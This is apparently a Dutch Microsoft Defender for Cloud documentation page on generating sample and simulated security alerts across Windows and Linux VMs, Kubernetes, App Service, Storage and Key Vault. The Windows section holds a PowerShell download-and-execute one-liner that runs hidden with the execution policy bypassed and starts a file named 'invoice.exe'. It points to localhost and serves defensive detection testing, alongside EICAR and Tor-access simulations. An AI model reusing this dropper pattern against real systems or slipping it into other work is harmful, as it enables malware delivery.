Waarschuwingen valideren in Microsoft Defender voor Cloud
In dit artikel wordt uitgelegd hoe u kunt controleren of uw systeem correct is geconfigureerd voor Microsoft Defender voor Cloud waarschuwingen, zodat u effectief beveiligingsrisico's kunt bewaken en erop kunt reageren.
Wat zijn beveiligingswaarschuwingen?
Waarschuwingen zijn meldingen die Defender voor Cloud genereert wanneer bedreigingen op uw resources worden gedetecteerd. Het geeft prioriteit aan en vermeldt de waarschuwingen, samen met de informatie die nodig is om het probleem snel te onderzoeken. Defender voor Cloud biedt ook aanbevelingen voor het oplossen van een aanval.
Zie Beveiligingswaarschuwingen in Defender voor Cloud en beveiligingswaarschuwingen beheren en erop reageren voor meer informatie.
Vereisten
Als u alle waarschuwingen wilt ontvangen, moeten uw computers en de verbonden Log Analytics-werkruimten zich in dezelfde tenant bevinden.
Voorbeeldwaarschuwingen voor beveiliging genereren
Als u de nieuwe preview-ervaring voor waarschuwingen gebruikt, zoals beschreven in Beheren en reageren op beveiligingswaarschuwingen in Microsoft Defender voor Cloud, kunt u voorbeeldwaarschuwingen maken op de pagina beveiligingswaarschuwingen in Azure Portal.
Voorbeeldwaarschuwingen gebruiken om:
- Evalueer de waarde en mogelijkheden van uw Microsoft Defender-abonnementen.
- Valideer alle configuraties die u hebt gemaakt voor uw beveiligingswaarschuwingen (zoals SIEM-integraties, werkstroomautomatisering en e-mailmeldingen).
Voorbeeldwaarschuwingen maken:
- Als gebruiker met de rol Inzender voor abonnementen selecteert u voorbeeldwaarschuwingen op de werkbalk op de pagina Beveiligingswaarschuwingen.
- Selecteer het abonnement.
- Selecteer de relevante Microsoft Defender-plan(en) waarvoor u waarschuwingen wilt zien.
- Selecteer Voorbeeldwaarschuwingen maken.
Er wordt een melding weergegeven die u laat weten dat de voorbeeldwaarschuwingen worden gemaakt:
Na een paar minuten worden de waarschuwingen weergegeven op de pagina beveiligingswaarschuwingen. Ze worden ook ergens anders weergegeven die u hebt geconfigureerd voor het ontvangen van uw Microsoft Defender voor Cloud beveiligingswaarschuwingen (verbonden SIEM's, e-mailmeldingen, enzovoort).
Tip
De waarschuwingen zijn voor gesimuleerde resources.
Waarschuwingen simuleren op uw Azure-VM's (Windows)
Nadat de Microsoft Defender voor Eindpunt-agent is geïnstalleerd op uw computer als onderdeel van de integratie van Defender for Servers, volgt u deze stappen vanaf de computer waarop u de aangevallen resource van de waarschuwing wilt zijn.
Open een opdrachtregelprompt met verhoogde bevoegdheid op het apparaat en voer het script uit:
Ga naar Start en typ
cmd
.Selecteer met de rechtermuisknop de opdrachtprompt en selecteer Uitvoeren als administrator.
Kopieer en voer de volgende opdracht uit bij de prompt:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'
.Het opdrachtpromptvenster wordt automatisch gesloten. Als dit lukt, wordt er binnen 10 minuten een nieuwe waarschuwing weergegeven op Defender voor Cloud blade Waarschuwingen.
De berichtregel in het PowerShell-vak moet er ongeveer als volgt uitzien:
U kunt ook de EICAR-testreeks gebruiken om deze test uit te voeren: Maak een tekstbestand, plak de EICAR-regel en sla het bestand op als een uitvoerbaar bestand op het lokale station van uw computer.
Notitie
Wanneer u testwaarschuwingen voor Windows bekijkt, moet u Ervoor zorgen dat Defender voor Eindpunt wordt uitgevoerd met realtime-beveiliging ingeschakeld. Meer informatie over het valideren van deze configuratie.
Waarschuwingen simuleren op uw Virtuele Azure-machines (Linux)
Nadat de Microsoft Defender voor Eindpunt-agent is geïnstalleerd op uw computer als onderdeel van de integratie van Defender for Servers, volgt u deze stappen vanaf de computer waarop u de aangevallen resource van de waarschuwing wilt zijn:
- Open een Terminal-venster, kopieer en voer de volgende opdracht uit:
curl -O https://secure.eicar.org/eicar.com.txt
- Het opdrachtpromptvenster wordt automatisch gesloten. Als dit lukt, wordt er binnen 10 minuten een nieuwe waarschuwing weergegeven op Defender voor Cloud blade Waarschuwingen.
Notitie
Wanneer u testwaarschuwingen voor Linux bekijkt, moet u Ervoor zorgen dat Defender voor Eindpunt wordt uitgevoerd met realtime-beveiliging ingeschakeld. Meer informatie over het valideren van deze configuratie.
Waarschuwingen in Kubernetes simuleren
Defender for Containers biedt beveiligingswaarschuwingen voor uw clusters en onderliggende clusterknooppunten. Dit wordt bereikt door het besturingsvlak (API-server) en de workload in containers te bewaken.
U kunt waarschuwingen simuleren voor het besturingsvlak en de workload met behulp van het kubernetes-hulpprogramma voor waarschuwingensimulatie.
Meer informatie over het verdedigen van uw Kubernetes-knooppunten en -clusters met Microsoft Defender for Containers.
Waarschuwingen simuleren voor App Service
U kunt waarschuwingen simuleren voor resources die worden uitgevoerd in App Service.
- Maak een nieuwe website en wacht 24 uur totdat deze is geregistreerd bij Defender voor Cloud of gebruik een bestaande website.
- Zodra de website is gemaakt, opent u deze met behulp van de volgende URL:
- Er wordt binnen ongeveer 1 tot 2 uur een waarschuwing gegenereerd.
Waarschuwingen simuleren voor Storage ATP (Advanced Threat Protection)
Navigeer naar een opslagaccount waarvoor Azure Defender for Storage is ingeschakeld.
Selecteer het tabblad Containers in de zijbalk.
Navigeer naar een bestaande container of maak een nieuwe container.
Upload een bestand naar die container. Vermijd het uploaden van bestanden die gevoelige gegevens kunnen bevatten.
Selecteer met de rechtermuisknop het geüploade bestand en selecteer SAS genereren.
Selecteer het gegenereerde SAS-token en de URL-knop (u hoeft geen opties te wijzigen).
Kopieer de gegenereerde SAS-URL.
Open de Tor-browser, die u hier kunt downloaden.
Navigeer in de Tor-browser naar de SAS-URL. U zou nu het bestand moeten zien en kunnen downloaden dat is geüpload.
AppServices-waarschuwingen testen
Een EICAR-waarschuwing voor app-services simuleren:
- Zoek het HTTP-eindpunt van de website door naar de azure-portalblade te gaan voor de App Services-website of door de aangepaste DNS-vermelding te gebruiken die aan deze website is gekoppeld. (Het standaard-URL-eindpunt voor de Azure-app Services-website heeft het achtervoegsel
https://XXXXXXX.azurewebsites.net
). De website moet een bestaande website zijn en niet een website die is gemaakt vóór de waarschuwingssimulatie. - Zoek het HTTP-eindpunt van de website door naar de azure-portalblade te gaan voor de App Services-website of door de aangepaste DNS-vermelding te gebruiken die aan deze website is gekoppeld. (Het standaard-URL-eindpunt voor de Azure-app Services-website heeft het achtervoegsel
https://XXXXXXX.azurewebsites.net
). De website moet een bestaande website zijn en niet een website die is gemaakt vóór de waarschuwingssimulatie. - Blader naar de URL van de website en voeg het volgende vaste achtervoegsel toe:
/This_Will_Generate_ASC_Alert
. De URL moet er als volgt uitzien:https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert
. Het kan enige tijd duren voordat de waarschuwing wordt gegenereerd (~1,5 uur).
Azure Key Vault-detectie van bedreigingen valideren
- Als u nog geen Key Vault hebt gemaakt, moet u er een maken.
- Nadat u de Sleutelkluis en het geheim hebt gemaakt, gaat u naar een virtuele machine met internettoegang en downloadt u de TOR-browser.
- Installeer de TOR-browser op uw VIRTUELE machine.
- Nadat de installatie is voltooid, opent u uw gewone browser, meldt u zich aan bij Azure Portal en opent u de Key Vault-pagina. Selecteer de gemarkeerde URL en kopieer het adres.
- Open TOR en plak deze URL (u moet zich opnieuw verifiëren voor toegang tot Azure Portal).
- Nadat u toegang hebt, kunt u ook de optie Geheimen selecteren in het linkerdeelvenster.
- Meld u in de TOR-browser af bij Azure Portal en sluit de browser.
- Na enige tijd activeert Defender voor Key Vault een waarschuwing met gedetailleerde informatie over deze verdachte activiteit.
Volgende stappen
In dit artikel hebben we aandacht besteed aan het valideren van waarschuwingen. Nu u bekend bent met deze validatie, bekijkt u de volgende artikelen:
- Azure Key Vault-bedreigingsdetectie valideren in Microsoft Defender voor Cloud
- Beveiligingswaarschuwingen beheren en erop reageren in Microsoft Defender voor Cloud - Informatie over het beheren van waarschuwingen en het reageren op beveiligingsincidenten in Defender voor Cloud.
- Beveiligingswaarschuwingen in Microsoft Defender voor Cloud